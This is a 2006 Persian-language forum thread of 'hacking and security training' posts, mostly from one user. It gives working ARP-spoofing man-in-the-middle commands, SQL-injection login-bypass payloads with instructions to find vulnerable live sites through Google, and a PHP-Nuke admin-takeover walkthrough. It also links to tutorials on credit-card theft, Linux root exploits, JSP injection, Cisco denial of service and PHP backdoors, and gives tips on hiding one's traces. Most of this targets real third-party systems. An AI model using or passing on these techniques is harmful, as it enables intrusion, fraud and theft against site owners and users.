PDA

مشاهده کامل : آموزش تخصصی شبکه و امنیت و ضد امنیت



صفحه ها : 1 [2] 3

sam_1980ir
22-08-2006, 22:10
سلام خدمت آقای pastoo و خسته نباشید اگر ممکن هست اموزش کامل Encrypt کردن را در سایت قرار بدین تحت شبکه domain

setareh_m
22-08-2006, 22:28
راستی pastoo جان

من مطالب کامل و آموزشی میخواهم در مورد sniff کردن شبکه.

که الان که من به یک شبکه دسترسی دارم عملا چطور این کار رو انجام بدم ؟

هر چی میخواهد بگو منظورم جزییات هست.

pastoo
22-08-2006, 23:17
سلام خدمت آقای pastoo و خسته نباشید اگر ممکن هست اموزش کامل Encrypt کردن را در سایت قرار بدین تحت شبکه domain

دوست من سوال واضحي نپرسيدي .
چه نوع Encrypt را مي خواي . براي فايل ؟ شبكه ؟ ...؟

در ضمن منظور از Encrypt را مي دوني؟ مي خواي مخفي وارد شبكه بشي ؟ يا فايل مخفي آپلود كني؟

pastoo
22-08-2006, 23:27
راستی pastoo جان

من مطالب کامل و آموزشی میخواهم در مورد sniff کردن شبکه.

که الان که من به یک شبکه دسترسی دارم عملا چطور این کار رو انجام بدم ؟

هر چی میخواهد بگو منظورم جزییات هست.


عمل sniff در اصطلاح شبکه های کامپیوتری عبارت است از مونیتور کردن ترافیک شبکه شامل تمام بسته هایی که از باس داده در حال عبور است، خواه مقصد بسته همان ماشین sniff کننده باشد و خواه هر ماشین دیگر متصل به آن باس داده. بنابراين نکته اساسی برای انجام موفق Sniff ، وجود باس داده مشترک (Shared Data Bus) بين sniffer و بقيه ماشينهاست.
(برنامه Ethereal (http://ethereal.com/) یکی از قویترین sniffer های موجود است)
یکی از تفاوتهای اساسی سوئیچ و هاب در یک شبکه کامپیوتری آن است که در شبکه مبتنی بر هاب بسته ها روی باس داده مشترک Broadcast می­شوند در نتيجه Sniff کردن بسته ها بسيار آسان خواهد بود.
اما در شبکه مبتنی بر سوئیچ، باس داده ميان هر دو نود به صورت يک مدار از پيش ساخته و مستقل از نودهای ديگر است، لذا صرف راه اندازی Sniffer کمکی به مونیتور کردن بسته های دیگر ماشینها نمیکند.
اما با استفاده از روش نفوذ موسوم به Man in the middle به راحتی می­توان کليه ترافيک بين دو نود در يک شبکه مبتنی بر سوئیچ را Sniff نمود. همانطور که در شکل مشخص است، در اين روش نفوذگر مسير ارتباط مستقيم دو ماشين را (که توسط سوئيچ فراهم شده) به سمت خود تغيیر می­دهد، و بدون آنکه کوچکترين تغييری در محتوای جريان داده ايجاد کند مثل يک repeater بسته ها را پس از Sniff کردن به سمت مقصد اصلی هدايت می­کند.
لذا اين روش مبتنی بر ارسال آدرس غلط به سمت سوئیچ با استفاده است بسته های arp جعلی است، به اين صورت که اگر نفوذگر H و دو قربانی C و S باشند:
الف): H به سوئیچ:IP ماشين C متعلق به کارت شبکه من است.
ب): H به سوئيچ: IP ماشين S متعلق به کارت شبکه من است.
تکرار مداوم اين دو پيغام جدول نگاشت IP Address/ MAC Address را در سوئيچ به نفع نفوذگر تغيير می­دهد. لذا تمام بسته هايي که مبدا و مقصدشان S و C (يا بالعکس) باشد به سمت H هدايت می­شوند.
ابزار لازم برای اين نفوذ در بسته Dsniff (http://www.monkey.org/~dugsong/dsniff/) موجود است. و اما نحوه انجام حمله:
فرض کنيم C، S و H سه آدرس IP بوده و H از طريقeth0 به سوئيچ مشترک بين سه ماشين متصل باشد. ابتدا بايد با فرمان زير دستگاه لينوکس H را به يک forwarder تبديل کنيد، در غير اينصورت اتصال بين A و B توسط H قطع خواهد شد.



Echo 1 > /proc/sys/net/ipv4/ip_forward

الف: در يک session لينوکس فرمان زير را اجرا کنيد:
arpspoof –i eth0 –t C S
ب: در session ديگر اين فرمان را اجرا کنيد:
arpspoof –i eth0 –t S C
ج: در session سوم يک sniffer اجرا کنيد:
tcpdump –i eth0 not arp

مي توني از نرم افزار cain هم كه آموزش تصويري را دادم نحوه sniff را ببيني

pastoo
22-08-2006, 23:37
آقای پستو جان خیلی ممنون از توضیحاتتون ولی این لینک که در اول گذاشتید ایراد دارد و هم چنین اگه میشه آموزش تصویری ادامه ی نت بایوس را بگذارید ممنون می شم منظورم برای کسانی که ادمینشان پسورد احتیاج دارند هست اگه میشه آموزش تصویریشو بزارید بهتره آخه من از آموزش تصویری بهتر سر در میارم می دونم که برای شما زحمت زیادی هست ولی اگه انجام بدید ممنون می شم چون در آموزش تصویری درک و فهم بهتر است و اگر هم فضا برای آپلود خواستید من دعوت نامه پرشین گیگ نا محدود دارم که می تونم به شما بدم تشکر از زحماتتون ممنون


اينم آموزش تصويري كه قول داده بودم


http://rapidshare.de/files/30376185/enum.pdf (http://rapidshare.de/files/30376185/enum.pdf)

pastoo
22-08-2006, 23:52
خیلی ممنون از شما pastoo

هر چند که بعضی از مطالب این تاپیک برای من تکراری هست ولی در کل به دلیل این که

همه مطالب مربوط در یکجا هستند تاپیک خوبی هست.

منتظر ادامه مطالب هستم چرا ادامه نمیدی ؟؟؟

موفق باشی.:rolleyes:

دوست عزيز ممنون از اظهار نظرت .
26 صفحه جلو آوردم و به كمك افراد متخصص احتياج دارم باور كن كار آساني نيست جمع كردن اين همه مطالب.
لطفا اگر شما هم مطلبي داري براي دوستان بزارين . ما هم استفاده مي كنيم

ممنون موفق باشيد

pastoo
23-08-2006, 00:06
سلام خدمت آقای pastoo و خسته نباشید اگر ممکن هست اموزش کامل Encrypt کردن را در سایت قرار بدین تحت شبکه domain

چند تا راه داریم...میتونیم از پروکسی استفاده کنیم...استفاده از نرمافزار hide IP و کلا نرم افزارهای ناشناس کننده و & get anonymous & surf anonymous &anonymous bowser
هم خوبه...ضمنا شما نمیتونی به صورت صد در صد رد پای خودت رو پاک کنی..میتونی ردپای خودتو خیلی کمرنگ کنی....اگر هم آموزش و مقاله در مورد پنهان کردن و پوشیدن ردپای خودت در هنگام نفوذ به سیستم ها و سرورها میخوای در تايپيك گزاشتم بگردي پيدا مي كني

sam_1980ir
23-08-2006, 01:11
با تشکر از شما اقای pastoo که هیچ سوالی رو بدون جواب نمی زارین
ما حدود 30 تا کامپیوتر داریم که تحت domain شبکه شدند من می خواستم روی server فایل های داخل هاردم رو Encrypt کنم که client وقتی اون فایل های Encrypt شده رو ریخت روی هاردش نتونه از اون حالت خارج کنه در کل من نرم افزاری می خوام که فایل های مهم رو نتونه تو cd و flash بریزه و ببره من شنیده بودم که از طریق encrypt که در ویندوز هست میشه این کار رو کرد از شما ممنون میشم که کمکم کنی و کلا بتونه اون فایل ها رو بخونه ولی نتونه کپی کنه

pastoo
23-08-2006, 08:40
با تشکر از شما اقای pastoo که هیچ سوالی رو بدون جواب نمی زارین
ما حدود 30 تا کامپیوتر داریم که تحت domain شبکه شدند من می خواستم روی server فایل های داخل هاردم رو Encrypt کنم که client وقتی اون فایل های Encrypt شده رو ریخت روی هاردش نتونه از اون حالت خارج کنه در کل من نرم افزاری می خوام که فایل های مهم رو نتونه تو cd و flash بریزه و ببره من شنیده بودم که از طریق encrypt که در ویندوز هست میشه این کار رو کرد از شما ممنون میشم که کمکم کنی و کلا بتونه اون فایل ها رو بخونه ولی نتونه کپی کنه

اين سوال به آموزش ويندوز مربوط است نه .... ولي چون 1 كوچولو به امنيت مربوط بود و دوست ما در شبكه مي خواستن اين كار را انجام دهند من پاسخ ميدم
خيلي بهتر است شما مهدوديت read only را براي فايل و فولدرتون در نظر بگيرين ولي اگه ميخواين كه رمز نگاري روي فايل هايتان انجام بدين اين راهشه .
آقا به خدا help windows بهترين كمك براي همه هست



To encrypt a file or folder

Open Windows Explorer (http://www.asrejavaan.com/ms-its:C:\WINDOWS\Help\encrypt.chm::/EXEC=,Explorer.exe, CHM=ntshared.chm FILE=alt_url_windows_component.htm).
Right-click the file or folder that you want to encrypt, and then click Properties.
On the General tab, click Advanced.
Select the Encrypt contents to secure data check box.
Notes

To open Windows Explorer, click Start, point to All Programs, point to Accessories, and then click Windows Explorer.
You can only encrypt files and folders on NTFS (http://www.asrejavaan.com/ms-its:C:\WINDOWS\Help\encrypt.chm::/HELP=glossary.hlp TOPIC=GLS_NTFS) file system volumes
Files or folders that are compressed cannot also be encrypted. If you encrypt a compressed file or folder, that file or folder will be uncompressed

sam_1980ir
24-08-2006, 01:28
با سلام و خسته نباشید خدمت آقای pastoo
اگه من بخوام تحت شبکه domain به کلاینت فقط دسترسی خواندن بدم یعنی نتونه فایلی رو که تو شبکه هست رو هارد خودش کپی کنه چیکار باید بکنم ممنون میشم اگه جواب منو بدین

pastoo
24-08-2006, 08:55
با سلام و خسته نباشید خدمت آقای pastoo
اگه من بخوام تحت شبکه domain به کلاینت فقط دسترسی خواندن بدم یعنی نتونه فایلی رو که تو شبکه هست رو هارد خودش کپی کنه چیکار باید بکنم ممنون میشم اگه جواب منو بدین


لطفا در بخش مربوطه سوال بفرمایید


دوستان سرم کمی شلوغه بر می گردم مطالب جذابی براتون دارم

setareh_m
25-08-2006, 11:47
سلام pastoo

من یه اکسپلوییت به زبان c می خوام کامپایل کنم اما متاسفانه هر چی میگردم

microsoft visual c ++ رو من تو گوگل پیدا نمی کنم لینک مطمین میخواهم .

هر لینکی که تو گوگل پیدا میکنم سر کاریه.

pastoo
25-08-2006, 12:08
1 سری از نرم افزار های هکینگ برای دانلود


http://www.hackerz.ir/d-u/files.php

pastoo
25-08-2006, 12:13
مقاله ایی که اینجا می زارم کامل ترین مقاله برای حملات DDOS است


http://ehsan120.persiangig.com/Doc%20Attack-%5Bp30forum.com%5D.zip

pastoo
25-08-2006, 12:20
مفهوم InterAction این است که شما مستقیما پشت کامپیوتری بشینید و از KeyBoard همان کامپیوتر استفاده کنید!
در مقاله زیر که توسط گروه امنیتی مردان نامرئی نوشته شده راههای زیادی برای نفوذ به کامپیوتر دیگران از به صورت InterAction وجود داره !!



http://ehsan120.persiangig.com/Admin-Pass-Hack-%5Bp30forum.com%5D.zip

pastoo
25-08-2006, 13:03
سلام pastoo

من یه اکسپلوییت به زبان c می خوام کامپایل کنم اما متاسفانه هر چی میگردم

microsoft visual c ++ رو من تو گوگل پیدا نمی کنم لینک مطمین میخواهم .

هر لینکی که تو گوگل پیدا میکنم سر کاریه.


از دوستانی که در بخش نرم افزار هستن سوال بفرمایید

ممنون

pastoo
28-08-2006, 19:46
آموزش تصویری یکی از هکهای روتر توسط موتور جستجو google



http://rapidshare.de/files/31072886/Router_Hacking_via_Google.rar (http://rapidshare.de/files/31072886/Router_Hacking_via_Google.rar)

mirvis
01-09-2006, 05:57
با سلام آقای پستومن یه کمک از شما داشتم پورت 23 کامپیوتر من بسته است چطور میتونم بازش کنم با تشکر من منتظر جواب شما هستم

pastoo
01-09-2006, 12:00
با سلام آقای پستومن یه کمک از شما داشتم پورت 23 کامپیوتر من بسته است چطور میتونم بازش کنم با تشکر من منتظر جواب شما هستم


Syntax


tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
Parameters


\\RemoteServer
Specifies the name of the server that you want to manage. If you do not specify a server, the local server is assumed.
start
Starts Telnet Server.
stop
Stops Telnet Server.
pause
Interrupts Telnet Server.
continue
Resumes Telnet Server.
/?
Displays help at the command prompt.
Remarks



You can remotely administer a computer running Telnet Server using the tlntadmn commands if both computers are running Windows XP. You can not use the tlntadmn commands to remotely administer a computer running Windows 2000 and Telnet Server from a computer that is running Windows XP
امیدوارم متوجه شده باشی اگه نشدی بگو فارسی توضیح بدم

mirvis
01-09-2006, 18:28
Syntax


tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
Parameters


\\RemoteServer
Specifies the name of the server that you want to manage. If you do not specify a server, the local server is assumed.
start
Starts Telnet Server.
stop
Stops Telnet Server.
pause
Interrupts Telnet Server.
continue
Resumes Telnet Server.
/?
Displays help at the command prompt.
Remarks


You can remotely administer a computer running Telnet Server using the tlntadmn commands if both computers are running Windows XP. You can not use the tlntadmn commands to remotely administer a computer running Windows 2000 and Telnet Server from a computer that is running Windows XP
امیدوارم متوجه شده باشی اگه نشدی بگو فارسی توضیح بدم


با تشکر دوست عزیز من متوجه نشدم اگه ممکنه فارسی توضیح بده

ac46
01-09-2006, 18:54
:mad: سلام دوستان احتیاج به کمک فوری شما دارم من یک (3 ) mainboard دارم کهcd کارت صدا وتصویر انرو گم کردم و احتیاج فوری به ان را دارم خواهشمندم هر کی این cdداره برام بذاره تا من دانلود بکنم (eibit) مدل(ep_3wtm) باتشکر اذ شما:o :o :mad: :mad: :mad: :mad: :mad:

ac46
02-09-2006, 02:38
کس نیست جواب بده بچهها

ac46
02-09-2006, 02:40
کسی نیست جواب بده

kaveh73
02-09-2006, 02:56
دوستان گرامی

باز هم تاکید می کنم این یک تاپیک اطلاعاتی و آموزشی است، لطفاً سوالاتتان را در انجمن ها و تاپیکهای تخصصی سوالات مطرح کنید، منبعد کلیه سوالات در این نوع تاپیکها بدون پاسخ حذف شده و به کاربرانی که رعایت نکنند کارت اخطار داده می شود.



این آخرین اخطار است

pastoo
04-09-2006, 00:29
با تشکر دوست عزیز من متوجه نشدم اگه ممکنه فارسی توضیح بده







tlntadmn [\\RemoteServer] [start



به این معنی است که شما در command prompt این مطالب رو تایپ می کنین .
به جای remoteserver شما باید ip دستگاه خود یا نام دستگاه در شبکه رو اعلام کنین و بعد از آن start نوشته شود به عنوان مثال اگر ip دستگاه من 19.168.1.1 باشد برای باز شدن پورت 23 در آن باید به این ترتیب عمل کنم




tlntadmn \\192.168.1.1 (file://\\192.168.1.1) start

pastoo
05-09-2006, 01:43
آموزش تصویری هک کردن پورتال های jsp به صورت اینجکتشن



دریافت فیلم آموزشی (http://satanichell.persiangig.com/video/Jsp%20inject.rar)

pastoo
05-09-2006, 01:44
در اين فيلم ما ميخواهيم با هم يك برنامه نمونه بنويسيم و نشان دهيم كه چگونه اكسپلوييت هايي كه Shell ميدهند نوشته ميشوند .
و Stackbof چيست ؟
توجه:
براي فهم بيشتر اين فيلم حتما مقاله هاي فارسي كه در سايت براي آموزش مقدمات Exploit نويسي قرار دارد را بايد مطالعه كنيد .

و نيز فكر ميكنم : ذكر اين نكته جالب باشد كه اين فيلم حدود يك سال پيش توسط استاد رضوي تهيه شده بود / كه به دلايلي فقط براي مدت 1 هفته بر روي وب قرار داشت .
در صورت استقبال از چنين فيلم هاي ويرايش هاي بعدي نيز در سايت قرار ميگيرد .

فيلم در حال RAR 6.5 مگابايت است و پس از باز شدن : 550 مگابايت ميگردد !!

http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=296) http://www.simorgh-ev.com/security/modules/mysections/images/size.gif 6.45_MD_NUMMB

pastoo
05-09-2006, 01:50
ARP DNS Spoofing در اصطلاح به حملاتي گويند كه شما در يك شبكه داخلي با فرستادن Packet هاي سيل آساي ARP به سوئيچ ها و در هم ريختگي آنها و فرستادن Packet هاي جعلي DNS در صورت آمدن درخواست از هر يك از Client ها ، ميتوانيد اطلاعات اشتباه به آنها بدهيد .
به عنوان مثال هنگامي كه يكي از client ها سايت www.google.com (http://www.google.com/) را ميزند مسيرياب و يا سوئيچ او را با Packet هاي مسموم Arp پذيرايي كرده و به سمت سايت www.yechizi.com (http://www.yechizi.com/) هدايت ميكنند .

دریافت (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=297)
به گفته مدیر گروه سیمرغ این روش در آزمایشگاه فوق تست شده و جواب داده است .

pastoo
06-09-2006, 01:16
فيلم برنامه نويسي Backdoor با php و حل مشكل Execute در سرور


شما در اين فيلم كه حدود 12 دقيقه ميباشد و به صورت كاملا كم حجم 2.5 مگاابايت در دسترس قرار دارد ، با نحوه مقابله با ماژول هايي كه در سرور هاي مبتني بر Php باعث run كردن فايل ها و يا در اصطلاح execute ميشوند اشنا ميشويد ، و در ضمن راه كارهاي عملي براي مديران سرور نيز بيان شده است كه با اين مشكلات مقابله كنند .
http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=1) http://www.simorgh-ev.com/security/modules/mysections/images/size.gif 2.57_MD_NUMMB

pastoo
06-09-2006, 01:19
آموزش جامع اسمبلي و Debuging براي اكسپلوييت نويسي

این فیلم ها گرفته شده از سایت امنیتی سیمرغ می باشد .
(http://www.simorgh-ev.com/security/modules/mysections/brokenfile.php?lid=12)
آموزش بسيار كامل اسمبلي و Debug برنامه اي كه نوشته ايد توسط ديباگر هاي معروف .
نويسنده :
وحيد نصيري
در مقاله اي 500 صفحه اي / همراه با مثال ها و نمونه برنامه هاي / نوشته شده به شرح اين مسائل ميپردازد .

از ويژه گي هاي بارز مقاله :
1- بررسي اسمبلي در ويندوز .
2- بررسي زبان اسمبلي و خانه هاي حافظه .
3 - زباني شيوا و روان
4 - بيان اصول اوليه حملات (به طور مستتر )
5 - ...


زبان اسمبلي / زبان مادر برنامه نويسي / زبانيست كه هكر ها به طور 100% در برنامه نويسي و روشهايي همچون :
1- اكسپلوييت نويسي Exploiting
2- Crack
3- BOF
4 - ويروس نويسي هاي پيشرفته و كم حجم !
5 - ...

احتياج فراواني پيدا ميكنند .

توصيه اكيد داريم كه اين مرجع مفيد را دريافت نماييد .

به سطحي برتر از علم ارتقاء پيدا كنيد .
http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=12) Version: 1 http://www.simorgh-ev.com/security/modules/mysections/images/size.gif 2.66_MD_NUMMBگزارش لينكهاي شكسته (http://www.simorgh-ev.com/security/modules/mysections/brokenfile.php?lid=12)

pastoo
06-09-2006, 23:15
اين مقاله زيبا را littel hacker عزيز تهيه و (ترجمه نموده ) است . مقاله به نحوه استفاده از ابزار حمله metasploit و يا در اصطلاح اصيل تر framework ميپردازد .
ابزار framework محصول گروه metasploit بوده و در دو نسخه تحت ويندوز و لينوكس مورد استفاده قرار ميگيرد .

تهيه ابزار Metasploit :

از سايت : http://www.metasploit.com (http://www.metasploit.com/)

فيلم هاي آموزشي براي دونوع حمله :
اين دو فيلم (البته Swf هست) آموزش نفوذ با استفاده از اکسپلويت هاي موجود در Metasploit هست.

http://www.irongeek.com/videos/metasploit1.swf

http://www.irongeek.com/videos/metasploitwmf.swf (http://www.irongeek.com/videos/metasploitwmf.swf)

(اين يکي آموزش استفاده از اکسپلويت تقريباً جديد WMF file code execution از طريق Metasploitهست.)

با تشكر از : networm عزيز براي تهيه فيلم ها .
http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=6) http://www.simorgh-ev.com/security/modules/mysections/images/size.gif 228.52 كيلو بايت گزارش لينكهاي شكسته (http://www.simorgh-ev.com/security/modules/mysections/brokenfile.php?lid=6)

pastoo
06-09-2006, 23:22
امروز با آموزش تصویری هک کردن سایت های پر ضعف نیوک که هر چند وقت یکبار باگ در آن ها کشف می شود اومدم . این آموزش متعلق به ورژن های ۷.۵ تا ۷.۸ می شود .
نحوه کار این برنامه : بعد از اجرای برنامه طبق دستور داده شده در فیلم برنامه تست می کند که سایت فوق آسیب پذیری دارد یا خیر در ادامه شما را ......... ( دانلود کنید و ببینید )
مطالبی که در فایل مشاهده خواهید کرد : ۱- آموزش هک کردن ( به صورت فایل فلش )
۲- برنامه فوق ( Exploit )
۳- تهیه کننده فیلم حتی لینک ها و فایلی که هنگام آموزش استفاده کرده به همراه فیلم در فایل فشرده شده قرار داده است و .....
حجم فیلم : 8856k
ارسال کننده آموزش هک : VirtualBoY
دریافت فیلم : Hack-phpnuke (http://filecenter.persiangig.com/video/phpnuke7.8.exe)


قابل ذکر است این طریقه هک امروزه خیلی استفاده میشه

pastoo
07-09-2006, 09:51
مقاله و فيلم حمله DOS به Router هاي Cisco با روش

LandAttck http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=301) http://www.simorgh-ev.com/security/modules/mysections/images/size.gif 0
اين مقاله در راستاي مقالات و حملات Lnad Attack كه تست نفوذپذيري Router ها و آسيب پذيري آنها را بررسي ميكرد در اوايل سال 85 در گروه كاري سيمرغ كليد خورد ، اين مقاله كه روش حمله Landattack را بر روي اين روتر ها بررسي ميكند ، گوشه اي از دست آورد هاي تحقيقات انجام شده است .

اين حمله بر روي آخرين Version از IOS هاي Cisco تست شده است .
سيستم هاي ديگر نيز قابليت آسيب پذيري را نيز دارند

pastoo
08-09-2006, 00:31
فیلم های آموزشی جدید


هک کردن کارت های اعتباری
این فیلم هک کردن CC توسط استاد Vampire ساخته شده البته برای هک کردن CC راهای خیلی خیلی زیادی هست که ایشون میگن زدن DB شاپینگ ها راحت ترین روشه ...

http://vampires.persiangig.com/Cchack.rar (http://vampires.persiangig.com/Cchack.rar)
دستیابی به روت در لینوکس Get Root Acces In Linux (http://www.xmors.com/forum/index.php?PHPSESSID=2e9540503680d55b85b39a117f036a7f&topic=875.0)
http://mormoroth.by.ru/LocalRoot.rar (http://mormoroth.by.ru/LocalRoot.rar)
فیلم های کرک و Injection
ابن فیلم درباره نحوه نصب لینوکس ( Knoppix ) بر روی ویندوز با استفاده از WMware هست ...
http://www.irongeek.com/videos/vmwareplayerlivecd.swf (http://www.irongeek.com/videos/vmwareplayerlivecd.swf)

این فیلم نحوه کرک کردن یوزر و پسورد ادمین ویندوز XP رو نشون میده
http://www.hemenpaylas.com/download/433662/admin_pass_edit_.rar.html (http://www.hemenpaylas.com/download/433662/admin_pass_edit_.rar.html)

d2kBlog 1.0.3 (memName) Remote SQL Injection
http://rapidshare.de/files/19757276/tr.rar.html (http://rapidshare.de/files/19757276/tr.rar.html)

آموزش هک کردن گالری 4Image که توی ایران هم خیلی استفاده میشه و اکسپلویتش هم توی milw0rm هست ....
http://www.hemenpaylas.com/download/819163/4Images_1.7.1_KaBaDaYi.rar.html (http://www.hemenpaylas.com/download/819163/4Images_1.7.1_KaBaDaYi.rar.html)

آموزش هک کردن OsCommerce 2.2
http://www.hemenpaylas.com/download/818602/Oscommerce_KaBaDaYi.rar.html (http://www.hemenpaylas.com/download/818602/Oscommerce_KaBaDaYi.rar.html)

pastoo
08-09-2006, 18:00
دوستان عزیز نظری سوالی راجع به آموزش ها ندارن ؟
اگر سوالی در زمینه امنیت است حتما بپرسید ؟

موفق و پیروز باشید

pastoo
08-09-2006, 18:04
در این مقاله شما با نحوه کامپایل کردن برنامه هایی که به زبان سی برای لینوکس نوشته شده است آشنا خواهید شده این مقاله همراه با تصاویر نصب cygwin نیز می باشد
دانلود (http://behfaraz.persiangig.com/video/Learnig%20CgyWin.rar)

pastoo
08-09-2006, 18:05
اين متن به بررسي انواع سيستمهاي امنيتي و بررسي نقاط ضعف و قوت هركدام مي‌پردازد. در اين بخش مقدماتي در مورد امنيت پروتكلها و انواع حملات بيان مي‌شود و بخشهاي بعدي به بررسي دقيق انواع فايروال (فيلتر ، NAT و پراكسي ) و سيستمهاي تهاجم‌ياب مي‌پردازد. سپس سه نمونه از نرم‌افزارهاي مفيد امنيتي (IPF، Snort و SAINT) معرفي مي‌گردد.
توصيه براي كساني كه Snort و config آن دردي برايشان شده ، درمان ناشدني !
http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=4) http://www.simorgh-ev.com/security/modules/mysections/images/size.gif 55.76 كيلو بايت گزارش لينكهاي شكسته (http://www.simorgh-ev.com/security/modules/mysections/brokenfile.php?lid=4)

pastoo
08-09-2006, 18:09
Asp-rider يه پورتاله فارسيه (به همين دليل براي من اهميت داره !)
در ضمن كمك به بهتر شدن او باعث Opensourec شدنش هم ميشه ( از ورژن 1.6 به بعد سورس ها بسته شده )


اینم بگم اگه خدای نکرده اقدام به هک کردن سایتی از این طریق پرداختید بدانید که شما فقط 1 بازیکن خوبی هستین نه 1 هکر موفق . چون 1 هکر حرفه ایی دنبال راه های حرفه ایی است

دریافت مقاله آموزشی (http://h1.ripway.com/vorojax/Asp-rider.rar)

AliR3za
08-09-2006, 19:33
سلام خدمت شما دوست عزیز
آقا من همین امروز یا تاپیک شما آشنا شدم و دیدم واقعاً چه مطالب پرباری رو گذاشتین
اول از همه میخاستم بگم تو کجا بودی تا حالا که من ندیدمت؟
دوم اینکه دمت واقعاً گرم ببین واقعاً گرما واقعاً دمت گرم

AliR3za
08-09-2006, 19:37
و یک سوال هم دارم
من میخام اگه بشه یکسری آموزش پیرامون هک کردن و امنیت چت رومهای ایرانی بذارید
اگه تا به حال به اوهها سر زده باشد اونها از سیستم جاوا استفاد میکنن میخاستم بدونم آیا باگی در سیستم اونها میشه پیدا کرد یا باگی پیدا شده؟
اگه هم به قول خودتون روش حرفه ایی تری به غیر از هک با اسکپلویت در مورد این سایتها دارید خیلی ممنون میشم بذارید

pastoo
08-09-2006, 22:33
و یک سوال هم دارم
من میخام اگه بشه یکسری آموزش پیرامون هک کردن و امنیت چت رومهای ایرانی بذارید
اگه تا به حال به اوهها سر زده باشد اونها از سیستم جاوا استفاد میکنن میخاستم بدونم آیا باگی در سیستم اونها میشه پیدا کرد یا باگی پیدا شده؟
اگه هم به قول خودتون روش حرفه ایی تری به غیر از هک با اسکپلویت در مورد این سایتها دارید خیلی ممنون میشم بذارید

دوست من خوش آمدید
لطف کنین تمام مطالب را از ابتدا مطالعه کنید من روش های هک بسیار زیادی مطرح کردم .
در رابطه با کلاینت هکینگ آموزشی نمیدم .
در رابطه با جاوا بگم باگهای خیلی زیادی وجود داره ولی شما ابتدا باید نکاتی را توجه کنی
1) نوع سیستم عامل سرور
2) نوع جاوای ریخته شده رو سرور
3) گشتن باگهای آن نوع مدل در google
4) پیدا کردن exploit آن باگ
5) نفوذ


مراحل جدا جدا در پست های گذشته توضیح داده شده مطالعه فرمایید

موفق باشید

pastoo
09-09-2006, 01:22
برای شروع کار ابتدا به گوگل بروید و در ان عبارت login.asp را سرچ کنید بعد حدود ۱۷ هزار سایت در گوگل به نمایش در می یاد که ادرس ان شبیه www.site.com/login.asp (http://www.site.com/login.asp) است حالا روی یکی از سایتها که همچنین ادرسی را دارند کلیک کرده تا وارد قسمت login سایت شوید بعد به جای username عبارت admin را تایپ کنید و به جای پاسورد or 1=1— را تایپ کنید و login کنید ممکن است سیستم امنیتی سایت بالا نباشد در این صورت error می دهد این پیغام ظاهر می شود The page cannot be displayed

There is a problem with the page you are trying to reach and it cannot be displayed.

ALL ODBC Error Messages
Microsoft OLE DB Provider for ODBC drivers error

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '
[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.
/verify .asp, line .

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '
[Microsoft] [ODBC SQL Server] Unclosed quotation mark before the
character string
Microsoft OLE DB Provider for ODBC Drivers error '80004005 '
[Microsoft][ODBC Microsoft Access Driver]

Microsoft JET Database Engine error '80040e14 '
حالا می فهمیم که سایت اسیب پذیر است و می توان انرا هک کرد و وارد بخش مدیریت شد اما اگر با چنین پیغامی Login Failed مواجه شدید امنیت سایت بالا است و به این سادگی ها هک نمی شود
اینهم چندین کد برای حمله به SQL Injection ها :
Username:admin
Password:' or'=*
Username:admin " or "a"="a
Password:' or'='
شما هم می تونید این کدها رو درست کنید همانطور که در کدهای بالا دیدید این کدها از همچنین *";
واژه هایی درست شده و با سرهم کردن انها می توانید یوزرنیم و پسورد بسازید

pastoo
11-09-2006, 23:34
من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com (http://www.google.com/)) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads
این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...name=Downloads (http://www.sitename.com/phpnuke/mod...name=Downloads) www.sitename.com/html/modules.php?name=Downloads (http://www.sitename.com/html/modules.php?name=Downloads) http://www.sitename.com/portal/modu...name=Downloads (http://www.sitename.com/portal/modu...name=Downloads) www.sitename.com/modules.php?name=Downloads (http://www.sitename.com/modules.php?name=Downloads)
برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads
اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php (http://www.sitename.com/admin.php)
اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.
خوب تالا ما فرض میکنیم که admin.php وجود داره.
من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.
شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.
بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.


کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.


کد :


دانلود (http://rapidshare.de/files/32811630/php.txt)

topgoal
